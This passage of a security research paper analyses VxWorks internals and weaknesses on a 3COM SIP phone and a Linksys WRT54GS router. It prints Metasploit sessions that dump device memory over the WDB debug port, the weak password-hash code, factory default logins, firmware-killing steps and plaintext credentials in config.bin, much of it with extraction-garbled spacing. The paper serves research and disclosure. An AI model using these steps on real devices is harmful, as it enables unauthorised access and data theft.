take over the system by installing malicious programs or backdoors. As a result
of this, OS can be used for nefarious purposes such as stealing sensitive data from
the machines and executing remote commands. Attacker can exploit the system
access rights and cause the applications to execute maliciously. Thus, analysis
of OS security benchmarks provides better insight about the robustness of the
operating system and helps to understand the serious repercussions of persistent
vulnerabilities.
In this paper , an extensive study on fault management and security model
of VxWorks has been conducted encompassing following topics
• A detailed analysis will leverage the extensive details about the protection
mechanisms and vulnerabilities that result in rooting the VxWorks. A
3COM SIPX phone running VxWorks have been used for this analysis.
• Discussion in detail about the security model of VxWorks OS firmware
running on Linksys router WRT54GS v6.
• Analysis of the potential attacks on VxWorks based on existing security
vulnerabilities.
5
6. 4 Architectural Overview
VxWorks is built around a highly advanced real-time kernel which is compati-
ble on Multicore architectures. A broad comparison to the requirements of high
availability systems[1,2]yields that VxWorks is capable of executing multitasking
processes based on symmetric multiprocessing. Multi cores help in sharing seg-
ments across the main memory through preemptive and round robin scheduling
algorithm including fast interrupt responses. In general, deadlocks are avoided
by ensuring appropriate bounds on the priority inheritance protocols and shared
resources are managed using mutual exclusion semaphores and binary counting.
POSIX real-time threads API have been fully implemented which is crucial for
the robust performance and memory protection. In VxWorks, user applications
run in their own isolated program space and do not come in conflict with the
kernels. VxWorks inherits interprocess communication, including support for
the Transparent Inter-Process Communication (TIPC) protocol and distributed
message queuing. Priority inheritance in VxWorks is performed by the mutex
[14]. VxWorks is fully ANSI C compliant with extended C++ features such
as exception handling and template support. Additional several mechanisms
for handling system errors and facilitating system error recovery are present
to ensure robust crush free operation. VxWorks also maintains a robust file
system. Development in VxWorks and image modification is performed using
Tornado [18]. Wind River systems provides core API which is shared between
the certified and non-certified versions of the OS. VxWorks application booting
sequence is presented in Figure 1.
Figure 1: VxWorks Application Boot Sequence
6
7. 5 Fault Management
In VxWorks, faults are handled at a global level which are undertaken by special
components explicitly designed for handling faults. The components do not al-
low faults to propagate by executing appropriate remedial measures. Handling
faults in a centralized manner results in consistent fault management system
throughout the system. Further, this process helps in making the debugging
process easier. VxWorks FMS (Failover Management System) uses the mech-
anism to monitor the status of various hardware devices. VxWorks does not
have built-in message passing capabilities. However, VxWorks is considered as
a function call based operating system. Basically, VxWorks is explicitly based
on the system call exception procedure because it results in the highest possible
performance. In contrary to this, message passing is considered as slow because
the degree of separation is increased among the processes.
5.1 Protection Domains, Sybsystems and Isolation
VxWorks implements the concept of ”protection domains” which is explicitly
required to develop a hardware-enforced protection model. This is done to en-
hance the protection model by inserting protection boundaries in the program
for strong system partitioning thereby showing unacceptance to legacy protec-
tion models such as trap-based system calls or intra-system message passing. It
is possible now to separate applications, shared libraries, shared data and sys-
tem software to varying degrees in order to attain the desired level of isolation
and protection
VxWorks uses inbuilt extensions which comprise of a number of subsystems
that are arranged in layers around the RTOS (Real Time Operating System)
core. These subsystems are not isolated and possess dependencies among differ-
ent software components. VxWorks OS is designed as a layer model. VxWorks
can be made extensible by using run time extension called as VxFusion which
allows interprocessor communication for distributed working across the network.
Apart from this, system resources are assigned to protection domains for con-
trolled execution as per the requirements. VxWorks manages these explicit
associations of different resources among the protection domains.
5.2 Understanding OMS and AMS
VxWorks AE (OS based on VxWorks 5.x) also has a Foundation HA extension
which takes care of the high level availability services such as fault detection and
hot swapping. The HA package actually consists of AMS (Alarm Management
System) and OMS (Object Management System) as a part of the fault manage-
ment framework. OMS basically presents the hardware and software objects in
an abstract way thereby representing them in a tree hierarchical model showing
the dependencies among them.
OMS can initiate the alarm but the alarm handler operations are restricted
by the relationship tree. AIL (Alarm Injection Layer) is considered as the EP
7
8. (Entry Point) into AMS. Alarm handler actually resides at the top of the tree
and the resultant alarm propagates from bottom to top in the relationship tree.
The mapping between alarm handler and sources can be either one to many
or many to one.The resultant actions of faults are defined by the developer
himself. However, if no alarm handler is associated with the alarm source, the
event is not considered to be a fault and AMS does not control it. Components
that detect the presence of faults and generate alarms are termed as hardened
objects. These objects are defined in an appropriate way in the system having
generic timeout, exit and error handling procedures for every service in order to
prevent locking of the whole system. For example:- device drivers are considered
as hardened objects. AMS provides more robust way of handling and dealing
with faults which in turn improves the reliability and working functionality of
the system.
6 Virtualization - Embedded Hypervisor
With the advent of virtualization, VxWorks guest OS has already been intro-
duced that works perfectly fine with the support of hypervisors. VxWorks works
in similar fashion as VxWorks native OS. This step enhances the functionality
and help the developers to design centralized systems by replacing multiple CPU
boards with a single board. Figure 2 shows the high level view of hypervisor
support in VxWorks guest OS.
Figure 2: VxWorks Hypervisor in Action
6.1 Hypervisor and Virtual Board Security
One of the basic security issue in implementing hypervisor is the appropriate
configuration of the virtual boards on which the application is going to be exe-
cuted. VxWorks hypervisor support wrload utility which can be used to perform
non legitimate operations. Wrload (supported only for 32 bit OS right now) is
capable enough to load any ELF image on to the any other virtual board on
the system. It is also possible to change the contents of any virtual board dy-
namically. Another security challenge is the fact that, wrload requires debug
8
9. privileges in order to perform operations. By default, VxWorks systems have de-
bug mode enabled. Misconfigured parameters and insufficient permissions may
result in exploitation of virtual boards and hypervisor through debug privileges.
7 VxWorks OS Security Model and Fallacies
As discussed earlier, VxWorks implements the concept of protection domains in
order to separate different software components.The protection domain inher-
its individual MMU (Memory Management Unit) and private address spaces.
MMU is responsible for checking validity of addresses in protection domains.
However, VxWorks design is flexible as design engineers can specify the usage
of different objects in the software components by defining execution bound-
aries during the runtime. This simply states that the developer is equipped
enough to create OEP (Object Entry Point) in the kernel domain according to
the requirements. In general, this design is not robust from the security point
of view.
7.1 Stack Overflow Detection and Protection
In general, when tasks are spawned in VxWorks, by default the stack is filled
with a special value (0xeeeeeeee). The memory model of various applications
designed for VxWorks requires careful decisions. VxWorks provides certain
inbuilt functions to detect the memory usage of various tasks in the application.
The function CheckStack () [10] raises a warning if any procedural task exceeds
the memory limit i.e. stack allocation. CheckStack () works appropriately when
tasks are running in a mode where VX NO STACK FILL macro is not defined.
In the advanced versions such as VxWorks AE, all the non kernel tasks
are protected under the guard pages. If stack overflow occurs inadvertently,
the task tries to enter the space of guard pages, MMU exception occurs which
notifies the stack overflow. However, this protection is not stringent enough
because guard pages are only of the size 4KB. In contrast, VxWorks provides
TASK EXTRA GUARD PAGES configuration parameter to extend the guard
page limit.
7.2 VxWorks Network Stack
VxWorks implements BSD 4.4-compliant TCP/IP stack. It inherits complete
routing support enabled to build IP routing and network devices using VxWorks
as a base system. VxWorks also provides the MUX interface to support inde-
pendence between the network protocol layer and the data link layer. To use a
driver in the data link layer, the network protocol calls the appropriate MUX
routine, when a driver is initialized in the data link layer. Applications can use
the socket interface to access features of the Internet Protocol (IP) suite but Vx-
Works does not have the support for signal functionality for sockets. VxWorks
also implements the ZBUF (set of socket calls based on a data abstraction )
9
10. that allows sharing of data buffers across different software modules. However,
there is a compatibility issue with the standard BSD code as compared to the
normal datagram (UDP) and stream (TCP) sockets which are fully compatible
with UNIX BSD 4.4.
STATUS etherInputHookAdd ( )
( FUNCPTR inputHook ,
Char ∗ pName , /∗Name o f d e v i c e ∗/
Int uint /∗ u n i t o f d e v i c e ∗/ )
BOOL I p F i l t e r H o o k (
struct ifnet ∗ pIf ,
s t r u c t mbuf ∗∗ pPtrMbuf ,
struct ip ∗∗ pPtrIpHdr ,
int ipHdrLen )
BOOL inputHook (
struct i f n e t pIf ,
char ∗ buffer , /∗ r e c e i v e d p a c k e t ∗/
int length )
BOOL outputHook
( struct i f n e t pIf ,
char ∗ buffer ,
int length )
STATUS i p F i l t e r H o o k A d d (FUNCPTR I p F i l t e r H o o k )
STATUS etherOutputHookAdd ( FUNCPTR outputHook )
Listing 1: VxWorks Network Stack - Hook Functions
The hook functions as presented in listing 1 can be used to design a packet
dissection module for monitoring the traffic running to and fro from the Vx-
Works network stack.
7.3 VxWorks and The SSL Game
SSL is always required to encrypt data in the transport layer. However, due
to small memory size of the devices build on VxWorks using ARM processors,
the complete implementation of OpenSSL [17] library is a very hard job. A
complete rebuild of OpenSSL libraries is required to work appropriately with
VxWorks. In addition, there is a need to remove a certain set of ciphers from
the libraries to make them compact and downloadable. Cryptlib [21] can be
used effectively for implementing required cryptographic modules in VxWorks
in order to incorporate SSL protocol. Generally, there are modifications required
in makefiles used for ”libssl.a” and ”libcrypt.a” in OpenSSL package (not all
packages are compatible with VxWorks).
7.4 Firewalling VxWorks
VxWorks itself does not have an inbuilt firewall in general. However, VxWorks is
perfectly designed to incorporate the third party firewall for security purposes.
Firefly [22] is the firewall that is used to configure the VxWorks for network
10
11. security. Firefly is a packet filtering firewall which performs stateful inspec-
tion dynamically on the inbound traffic. This firewall is defined specifically for
embedded devices and works as per the configured policies.
In fact, VxWorks actually holds a Achilles certification [19,20] which com-
prises of a number of tests to detect the robustness of the network stack in
filtering of the bad and malformed packets. This shows the effectiveness of
VxWorks in detecting intrusion. As a matter of fact, VxWorks lacks NAT capa-
bilities that could also be added using network level hooks, as discussed earlier.
7.5 VxWorks Debugging Interface
VxWorks executes thread with the priorities and follows the process of pre-
emptive scheduling. VxWorks basically implements an information bus (shared
memory area) for passing critical information among the different running com-
ponents. All the operations in the bus execute according to the priority of the
tasks. The access restrictions are synchronized with mutual exclusion locks. In
order to avoid problems like mutex blocking etc, an active debugging interface
exists. VxWorks runs a very well designed debugging interface on UDP port
17185. This port runs active WDB agent which is a system level debugging ser-
vice provided by the VxWorks. However, this debugging service provides access
to the memory and one can read, write to memory locations efficiently. The
debugging service is structured over Sun RPC protocol. Since it is on UDP, it
does not have any standard authentication procedure [6]. If the port is open,
one can access the debugging interface directly. The 3COM SIP Phone uses
VxWorks as base OS. A typical scan presented in listing 2 shows the presence
of wdbrpc on port 17185. A list of devices that are vulnerable to debugging
interface security flaw is presented here [11].
SIP / 2 . 0 404 Not Found
From : ” d e f a u l t ”<s i p : d e f a u l t @ 1 2 . 2 3 8 . 7 1 . 1 1 5 > ;
t a g =30636565343737333
To : ” d e f a u l t ”<s i p : d e f a u l t @ 1 2 . 2 3 8 . 7 1 . 1 1 5 >
C a l l −I d : 2 5 8 0 1 3 1 1 4 4 8 8 9 3 3 3 6 8 0 1 9 9 9 8
Cseq : 1 OPTIONS
Via : SIP / 2 . 0 /UDP 7 8 . 1 2 3 . 1 6 5 . 1 1 9 : 5 0 6 0 ;
branch=z9hG4bK −2515319038; r p o r t =5060;
received =184.82.238.216
Date : Wed, 23 Feb 2011 1 6 : 4 9 : 2 1 GMT
Allow : INVITE , ACK, CANCEL, BYE, REFER,
OPTIONS, REGISTER, SUBSCRIBE, NOTIFY
User−Agent : 3Com −SIP−Phone / v2 . 6 . 0
( sipXphone ) ( VxWorks )
root@vmware−virtual −machine : / home/vmware#
nmap −P0 −sS −sU −A −O 1 2 . 2 3 8 . 7 1 . 1 1 5 −p 17185
Nmap s c a n r e p o r t f o r 1 2 . 2 3 8 . 7 1 . 1 1 5
Host i s up ( 0 . 0 0 0 3 5 s l a t e n c y ) .
PORT STATE SERVICE VERSION
17185/ t c p f i l t e r e d unknown
11
12. 17185/ udp open | f i l t e r e d wdbrpc
D e v i c e t y p e : g e n e r a l p u r p o s e | s t o r a g e −misc
Listing 2: Scanning the 3COM SIPX Phone
msf a u x i l i a r y ( w d b r p c v e r s i o n ) > s e t RHOSTS 1 2 . 2 3 8 . 7 1 . 1 1 5 − 1 1 6
RHOSTS => 1 2 . 2 3 8 . 7 1 . 1 1 5 − 1 1 6
msf a u x i l i a r y ( w d b r p c v e r s i o n ) > run
[∗] 12.238.71.115: 5.4.2
PC PENTIUM h o s t : / dos0 / R6 5 22 /vxWorks
msf a u x i l i a r y ( w d b r p c b o o t l i n e ) >
s e t RHOSTS 1 2 . 2 3 8 . 7 1 . 1 1 5 − 1 1 6
RHOSTS => 1 2 . 2 3 8 . 7 1 . 1 1 5 − 1 1 6
msf a u x i l i a r y ( w d b r p c b o o t l i n e ) > run
[ ∗ ] 1 2 . 2 3 8 . 7 1 . 1 1 5 : 5 . 4 . 2 PC PENTIUM
h o s t : / dos0 / R6 5 22 /vxWorks
[ ∗ ] 1 2 . 2 3 8 . 7 1 . 1 1 5 : BOOT a t a = 0 , 0 ( 0 , 0 )
>
h o s t : / dos0 / R6 5 22 /vxWorks e = 1 9 2 . 0 . 0 . 1 tn=e l b r u s f =0x0 o=e l P c i
[ ∗ ] A u x i l i a r y module e x e c u t i o n c o m p l e t e d
Listing 3: Gathering Version and Bootline Information - 3COM SIPX Phone
msf a u x i l i a r y ( wdbrpc memory dump ) > s e t RHOST 1 2 . 2 3 8 . 7 1 . 1 1 5
RHOST => 1 2 . 2 3 8 . 7 1 . 1 1 5
msf a u x i l i a r y ( wdbrpc memory dump ) > run
[ ∗ ] Attempting t o dump system memory . . .
[ ∗ ] 1 2 . 2 3 8 . 7 1 . 1 1 5 Connected t o 5 . 4 . 2 − PC PENTIUM ( h o s t : / dos0 /
R6 5 22 /vxWorks )
[ ∗ ] Dumping 0 x 2 6 f f f 0 0 0 b y t e s from b a s e a d d r e s s 0 x00000000 a t o f f s e t
0 x00000000 . . .
[ ∗ ] [ 00 % ] Downloaded 0 x000104b4 o f 0 x 2 6 f f f 0 0 0 b y t e s ( c o m p l e t e a t
2011−04−14 0 2 : 5 0 : 0 7 −0400)
[ ∗ ] [ 00 % ] Downloaded 0 x000203dc o f 0 x 2 6 f f f 0 0 0 b y t e s ( c o m p l e t e a t
2011−04−14 0 1 : 2 6 : 4 7 −0400)
..............................
[ −] A u x i l i a r y i n t e r r u p t e d by t h e c o n s o l e u s e r
[ ∗ ] A u x i l i a r y module e x e c u t i o n c o m p l e t e d
Listing 4: Downloading Memory Dump - 3COM SIPX Phone
Listing 3 shows the successful enumeration of VxWorks version and boot-
line parameters using Metasploit [5] auxillary modules. Listing 4 shows the
downloading of memory content from 3COM SIP IPhone. This debugging ser-
vice possesses an inherent vulnerability which provides open access to perform
operations on the remote machine running VxWorks. However, by using WDB
routine core library and executing code through this running service, it is pos-
sible to write in memory location remotely.
12
13. 7.6 Weak Password Encryption Algorithm
VxWorks uses inbuilt vxencrypt utility to generate encrypted password which
uses weak hashing algorithm [4] as presented in listing 5.
STATUS l o g i n D e f a u l t E n c r y p t
( c h a r ∗ in , /∗ i n p u t s t r i n g ∗/
c h a r ∗ out /∗ e n c r y p t e d s t r i n g ∗/ ) {
int ix ;
u n s i g n e d l o n g magic = 31695317;
unsigned long passwdInt = 0 ;
i f ( strlen ( in ) ” 8 | | s t r l e n ( in ) ” 40) {
e r r n o S e t ( S loginLib INVALID PASSWORD ) ;
r e t u r n (ERROR) ; }
f o r ( i x = 0 ; i x ” s t r l e n ( i n ) ; i x ++)
p a s s w d I n t += ( i n [ i x ] ) ∗ ( i x +1) ˆ ( i x +1) ;
s p r i n t f ( out , ”%u” , ( l o n g ) ( p a s s w d I n t ∗ magic ) ) ;
f o r ( i x = 0 ; i x ” s t r l e n ( out ) ; i x ++){
i f ( out [ i x ] ” ’ 3 ’ ) out [ i x ] = out [ i x ] + ’ ! ’ ;
i f ( out [ i x ] ” ’ 7 ’ ) out [ i x ] = out [ i x ] + ’ / ’ ;
i f ( out [ i x ] ” ’ 9 ’ ) out [ i x ] = out [ i x ] + ’B ’ ; }
r e t u r n (OK) ; }
Listing 5: VxWorks Weak Encryption Algorithm
In general, the total number of permutations for this algorithm is not a very
high and can be brute forced very easily. This can be effectively supported by
no account lockout policy used by VxWorks after a number of missed attempts.
One can use FTP or telnet as a protocol to launch this attack.
7.7 NDP Information Disclosure
IPv6 [12] uses Neighbor Discovery Protocol (NDP) [9] for location routers on the
link. VxWorks real time OS implements NDP in an insecure way [3] in order
to discover the network reachability of the nearby nodes on the same IPv6
link. Attacker using spoofed IPv6 address as source address forces the router to
create a cache entry. After successful creation of entry, IPv6 implementation in
VxWorks creates a Forward Information Base (FIB) which may trick the router
to forward traffic to the attacker residing in the same IPv6 network. Attacker
may intercept the private traffic and in certain scenarios may cause Denial of
Service (DOS) attack by congesting the network. This flaw was discovered in
2008 and has not been patched till yet.
8 Design of VxWork 5.x - Firmware
Firmware is the heart of any embedded device. The firmware analysis provide a
more robust picture of the security model opted by the device. It also helps us to
13
14. identify security vulnerabilities in the device. In this section, VxWorks firmware
details are dissected to understand the discreet details about the firmware.
8.1 VxWorks Firmware Generic Structure
VxWorks OS (firmware) provides a reduced flash and RAM which is not com-
patible with the third party firmware until the proprietary image is killed and re-
flashed to install a new open source firmware. Generally, VxWorks 5.x firmware
image consists of 8 trailer files and 8 primary files, thus in total 16 different
internal files. Listing 6 shows the analyzed layout of VxWorks firmware image
in the Linksys router. The primary files are written to flash specifically where
as trailer files (unknown in nature) are the supporting files to make the firmware
image intact. The images usually ends with a 32 bit aligned boundary.
E : a u d i t vxworks>w r t v x i m g t o o l . e x e v x w o r k s w r t 4 5 g s . b i n
+ Found parameter , view f i r m w a r e
+ I n f i l e parameter vxworks wrt45gs . bin
Extracting firmware vxworks wrt45gs . bin
Firmare f i l e s i z e i s 1769384 b y t e s
Code p a t t e r n : 5SGW
B u i l d date : 10−05−09
Vendor name : L i n k s y s
D e v i c e name : WRT54GS
Checksum : 0x9FC74AB0 ( g i v e n )
Checksum : 0x9FC74AB0 ( c a l c u l a t e d )
Checksum CORRECT
+ Trailing f i l e s :
File descriptor 0 , Type Id : 16
File descriptor 1 , Type Id : 17
File descriptor 2 , Type Id : 18
File descriptor 3 , Type Id : 19
File descriptor 4 , Type Id : 341191297
File descriptor 5 , Type Id : −1616601592
File descriptor 6 , Type Id : 18499
File descriptor 7 , Type Id : 759
+ Primary f i l e s :
File descriptor 0 , Name : vxworks . b i n
File descriptor 1 , Name : igwhtm . dat
File descriptor 2 , Name : l a n g p a k e n . dat
File descriptor 3 , Type I d : 11
File descriptor 4 , Type I d : 12
File descriptor 5 , Type I d : 13
File descriptor 6 , Type I d : 14
File descriptor 7 , Type I d : 15
Done !
Listing 6: VxWorks 5.x-6.x Firmware Image
14
15. 9 VxWorks Firmware Security Analysis
In order to analyze the security features in the real time environment, we looked
into the VxWorks 5.x OS (firmware) running on Linksys router WRT54GS ver-
sion 6. As we know, VxWorks is a proprietary firmware, there are a number of
restrictions applied on it as compared to open source firmwares such as Linux
and DD-WRT. During the course of this experiment, we analyzed the security
model of firmware 1.50.6 which is used in VxWorks 5.x-6.x versions.
9.1 Hacking Boot Sequence Program (BSP)
The most critical step in VxWorks firmware hacking is the replacement of Boot
Sequence Program (BSP) with the Common Firmware Environment (CFE).
The generic way to do this process is by using JTAG programming cable which
is replaced with the parallel-3 programming cable. However, following points
should be taken into account while setting JTAG interface with the motherboard
or the embedded device board.
• It provides a connection from the parallel port on your PC to a standard
6-pin JTAG header on the target board. However, the pins have to be
selected in the right manner. This is because JTAG header has to be
installed on the target board before actual programming can be done.
• NVRAM (-erase:nvram) and the kernel (-erase:kernel) should be removed
appropriately in order to take control of the router on the embedded de-
vice.
• One should take the backup of the CFE image (-backup:cfe). The backup
must be taken atleast three times so that final verification can be done
after validating the contents of CFE.
• The last step is to flash the new firmware (open source) on the target
board through TFTP.
For analyzing VxWorks firmware (or any firmware), the best way is to dis-
assemble the BSP. This is because BSP parses the structural code of VxWorks
firmware format. The next step is to look forward for the different types of
blocks (as most blocks are unidentified) and try to verify whether the unused
block can be used to flash the new image over BSP i.e. replacing BSP with
CFE tactically. In other words, detecting which block is being used for boot
loading process. However, this process also includes the verification of checksum
algorithm. This trick is used to kill VxWorks firmware and this binary file is ap-
plied during the management mode. Jeremy Collake from bitsum technologies
has developed a VxWorks firmware killing binary that can also be used directly.
For different versions of Linksys router, one can also modify the code to run
appropriately on other firmwares.
15
16. NOTE: For doing symmetric analysis on VxWorks firmware, the ”/dev/t-
tyS0” team has released a tutorial for reversing VxWorks [23 ] firmware image.
The tutorial is fruitful, when a firmware has to be reversed without the device
at hand.
9.2 VxWorks Firmware Killer
Generally, VxWorks firmware used in home routers such as WRT54GS (Linksys)
has reduced flash memory and RAM. There are a lot of restrictions posed on the
VxWorks firmware in order to have controlled secure environment. However, it
is still possible to kill this firmware and load another third party firmware such
as DD-WRT. Installing a new firmware by killing the old version of firmware is
termed as flashing process. In this step, no hardware modifications take place.
Listing 7 shows the the output of the VxWorks killer binary.
E : a u d i t vxworks>w r t v x i m g t o o l . e x e −x v x w o r k s k i l l e r g v 0 6 . b i n
WRT54G/GS v5−v6 f i r m w a r e image b u i l d e r , e x t r a c t o r , f i x e r , and
viewer
Extracting firmware v x w o r k s k i l l e r g v 0 6 . bin
Firmare f i l e s i z e i s 327168 b y t e s
Code p a t t e r n : 5V W
G
B u i l d date : 07−08−06
Vendor name : L i n k s y s
D e v i c e name : WRT54G
Checksum : 0x1A21473A ( g i v e n )
Checksum : 0x1A21473A ( c a l c u l a t e d )
Checksum CORRECT
+ Trailing f i l e s :
+ Primary f i l e s :
−
F i l e d e s c r i p t o r 0 ; Type I d : 1 ;
Name : bootrom . b i n ; S i z e : 326656 ;
W r i t i n g f i l e bootrom . b i n
−
F i l e d e s c r i p t o r 1 ; Type I d : 0
Name : ; Size : 0
Done !
Listing 7: Extracting CFE image of VxWorks Killer
In listing 8, CFE (Common Firmware Environment) [7] image (bootrom.bin)
[15] has been extracted from the primary file. Image tool utility [8] is used
to extract CFE image. It is also possible to tamper with the VxWorks Boot
Sequence Program (BSP) with BSPTOOL [16].
E : a u d i t vxworks>i m g t o o l n v r a m . e x e bootrom . b i n )
F re e f o r a l l t h e world . GPL L i c e n s e .
+ CFE image : bootrom . b i n
+ Reading nvram . . .
b o a r d f l a g s =0x2558 ; boardnum=42
b o a r d r e v=0x10 ; v x k i l l e d=g
16
17. t e a c u p=db90h ; et0macaddr = 0 0 : 4 0 : 1 0 : 1 0 : 0 0 : 0 1
i l 0 m a c a d d r = 0 0 : 4 0 : 1 0 : 1 0 : 0 0 : 0 2 ; w l 0 g p i o 0=2
w l 0 g p i o 1=5 ; w l 0 g p i o 2=0
w l 0 g p i o 3=0 ; b o a r d t y p e=0x0467
sromrev=2 ; c l k f r e q =200
s d r a m i n i t =0x0002 ; s d r a m c o n f i g =0x0032
s d r a m r e f r e s h =0 ; s d r a m n c d l=0
et0 phyad dr =30 ; et0mdcport=0
et1 phyad dr=0x 1 f ; w l 0 i d=0x4318
aa0=3 ; ag0=2
pa0maxpwr=72 ; p a 0 i t s s i t =62
pa0b0=0x176e ; pa0b1=0x f a 3 5
pa0b2=0 x f e 7 7 ; opo=12
w l 0 g p i o 5=2 ; c c t l =0
c c o d e=0 ; vlan0hwname=e t 0
v l a n 0 p o r t s =3 2 1 0 5∗ ; vlan1hwname=e t 0
v l a n 1 p o r t s =4 5 ; l a n d e v s=v l a n 0 wl0
wandevs=e t 0 ; l a n i p a d d r = 1 9 2 . 1 6 8 . 1 . 1
l a n n e t m a s k = 2 5 5 . 2 5 5 . 2 5 5 . 0 ; b o o t w a i t=on
r e s e t g p i o =7 ; watchdog =3000
g p i o 1=s e s l e d ; g p i o 1 4=s e s b u t t o n
Embedding nvram . . .
+ W r i t i n g nvram . . .
b o a r d f l a g s =0x2558 ; boardnum=42
b o a r d r e v=0x10 ; v x k i l l e d=g
t e a c u p=db90h ; et0macaddr = 0 0 : 4 0 : 1 0 : 1 0 : 0 0 : 0 1
i l 0 m a c a d d r = 0 0 : 4 0 : 1 0 : 1 0 : 0 0 : 0 2 ; w l 0 g p i o 0=2
w l 0 g p i o 1=5 ; w l 0 g p i o 2=0
w l 0 g p i o 3=0 ; b o a r d t y p e=0x0467
sromrev=2 ; c l k f r e q =200
s d r a m i n i t =0x0002 ; s d r a m c o n f i g =0x0032
s d r a m r e f r e s h =0 ; s d r a m n c d l=0
et0 phyad dr =30 ; et0mdcport=0
et1 phyad dr=0x 1 f ; w l 0 i d=0x4318
aa0=3 ; ag0=2
pa0maxpwr=72 ; p a 0 i t s s i t =62
pa0b0=0x176e ; pa0b1=0x f a 3 5
pa0b2=0 x f e 7 7 ; opo=12
w l 0 g p i o 5=2 ; c c t l =0 ; c c o d e=0
vlan0hwname=e t 0 ; v l a n 0 p o r t s =3 2 1 0 5∗
vlan1hwname=e t 0 ; v l a n 1 p o r t s =4 5
l a n d e v s=v l a n 0 wl0 ; wandevs=e t 0
lan ipaddr =192.168.1.1 ; lan netmask =255.255.255.0
b o o t w a i t=on ; r e s e t g p i o =7
watchdog =3000 ; g p i o 1=s e s l e d
g p i o 1 4=s e s b u t t o n
Completed s u c c e s s f u l l y . .
Listing 8: Extracting NVRAM variable from Bootrom.bin
Listing 8 shows how exactly the nvram is updated and embedded so that new
values can be written. The scenarios discussed above show the potential threats
of VxWorks firmware used in routers. The nvram variables are used to define
the boot sequence pattern during reboot and other critical settings. Before,
installing the new firmware on VxWorks device, a binary file (bootrom.bin) is
17
18. designed which provides default nvram variables that are required to boot the
router during firmware upgrade. In general, the nvram is re-flashed with new
boot parameters which itself prepares the router to be ready for changes in
the firmware. Basically, embedded nvram is used, when real nvram is either
corrupted or empty so that the device can be restored to defaults.
9.3 Services and Port Layout
There are certain differences in the remote management of the VxWorks running
on Linksys as compared to other open source firmwares which are as follows:
• By default, WRT54GS ( running VxWorks 5.x) version 6 does not sup-
port the Telnet and FTP as a part of the remote administration process.
The firmware has restricted the use of these protocols and only supports
HTTP/HTTPS over port 80 and 8080. This constraint actually reduces
the interactivity with the OS.
• The firmware does not support SSH (Secure Shell) protocol for remote
administration. In order to use the SSH, one has to kill VxWorks and
re-flash the open source firmware such as DD-WRT [13].
Listing 9 shows the scanning results of our testbed environment running Vx-
Works 5.x on Linksys.
S t a r t i n g Nmap 5 . 5 1 ( h t t p : //nmap . o r g ) a t 2011−03−19 0 0 : 5 9 E a s t e r n
D a y l i g h t Time
Nmap s c a n r e p o r t f o r 1 9 2 . 1 6 8 . 1 . 1
Host i s up ( 0 . 0 0 2 6 s l a t e n c y ) .
Not shown : 96 f i l t e r e d p o r t s
PORT STATE SERVICE VERSION
21/ t c p closed ftp
23/ t c p closed telnet
80/ t c p open http I n t o t o httpd 1 . 0
1723/ t c p open pptp Intoto
MAC Address : 0 0 : 1 8 : 3 9 : 8 1 : 7 7 : B5 ( C i s c o −L i n k s y s )
D e v i c e t y p e : WAP| broadband r o u t e r
Running : L i n k s y s embedded , N e t g e a r embedded , N e t g e a r VxWorks 5 .X
OS d e t a i l s : L i n k s y s WRT54G o r WRT54G2, o r N e t g e a r WGR614 o r
WPN824v2 w i r e l e s s broadband r o u t e r , N e t g e a r WGT624 WAP, N e t g e a r
WGR614v7 , WGT624v3 , o r WPN824v2 WAP ( VxWorks 5 . 4 . 2 )
Network D i s t a n c e : 1 hop
OS and S e r v i c e d e t e c t i o n p e r f o r m e d . P l e a s e r e p o r t any i n c o r r e c t
r e s u l t s a t h t t p : //nmap . o r g / s u b m i t / .
Nmap done : 1 IP a d d r e s s ( 1 h o s t up ) sc an n ed i n 3 7 . 5 6 s e c o n d s
Listing 9: Scanning the WRT54GS v6
9.4 Factory Default Passwords
VxWorks runs on a number of embedded devices which are configured with fac-
tory default passwords that are used to configure the installed firmware. There
18
19. is no doubt that enforcing password policies is a configuration issue but it is
an unavoidable part of security. VxWorks like other firmwares also implement
factory default passwords. For example: VxWorks used in router devices are
configured with (admin,admin) , (guest,guest) username and password combi-
nation respectively. This fact should be taken into account when any VxWorks
device is tested for security concerns while deploying in the production environ-
ment.
9.5 Config.bin - Inappropriate Encryption
The backup restoration is a standard process for taking control of all the con-
figuration parameters. Usually, all the firmware backup files are stored in the
binary format as config.bin. Generally, the file is structured in a manner which
is easily readable by the firmware while restoring and upgrading. Editing the
config.bin file produces scrambled output because of the random code. This
gives an impression that config.bin is not fully encrypted or compressed insuf-
ficiently. However, reading the config.bin file carefully , one can find plain text
parameters. Since the size of the file is not big , walking through the file is not a
hard task. Unfortunately, the config.bin file produces the router administration
password, SSID and secret key in plain text. Figure 3 shows the successful trac-
ing of security credentials in config.bin file. This security issue has been found
during the course of this experiment.
Figure 3: Configuration Binary File - Clear Text Credentials
19
20. 10 Embedded Devices - Truth about Security
There are certain truths about embedded device security that must be taken into
account while doing reverse engineering and auditing for security vulnerabilities.
Some of the generic issues are discussed as follows
10.1 Embedded Private Keys - HTTPS Communication
Nowadays, every embedded device provide a web interface in order to administer
the device. It has been noticed that many vendors embed the private keys in
the firmware itself. Ofcourse, these private keys vary from version to version
but hard coding is not a secure practice. It means that if a device is configured
to communicate over HTTPS, the device is going to use the private key that is
hard coded in the firmware. This is a potential security issue because firmwares
are available openly and on successful reversing the keys can be extracted easily.
10.2 Firmware Checksum Algorithms
The checksum algorithm that are used in the firmwares are not robust and re-
versing them is a trivial process. The firmwares do not use multiple obfuscation
algorithms and long message digests. The firmwares require more sophisticated
implementation of cryptographic modules.
10.3 Insecure Web Interfaces
Vulnerabilities in web interface can be disastrous from security point of view.
The html pages are embedded in zipped format and are compressed in the
firmware. Once the device boots and firmware is loaded, the web interface is
installed and can be easily accessed through port 80 or 8080. The security
model of web interface in firmware is not secure and is always prone to security
vulnerabilities. OWASP TOP 10 [24] fits very well in testing web interfaces
against critical vulnerabilities. A number of web attacks can be conducted
easily to control the device remotely.
10.4 Unpatched Firmware and Obsolete Versions
Firmwares are not updated regularly.. It has been analyzed that updating
firmware on embedded devices is not a security practice as in consideration
to the operating system. It is very easy to find embedded devices running
unpatched and older versions of firmware which provide an attack surface to
control the device by exploiting vulnerabilities.
20
21. 11 Future Work
A number of vulnerabilities discussed in this paper are in the process of be-
ing patched. A thorough Understanding of the OS vulnerabilities can help
researchers to delve deeper into the inherent security model of VxWorks. It
can contribute to the creation of new robust and effective security models. Vx-
Works being a real OS is more secure as compared to the other real OS, but the
presence of security vulnerabilities makes it prone to attacks.OS security testing
helps to eradicate a number of flaws thereby making the OS more secure. In
the coming times, security concerns should be given utmost importance. Con-
sequently, OS designs should be validated regularly for detection of potential
flaws thereby eradicating security vulnerabilities.
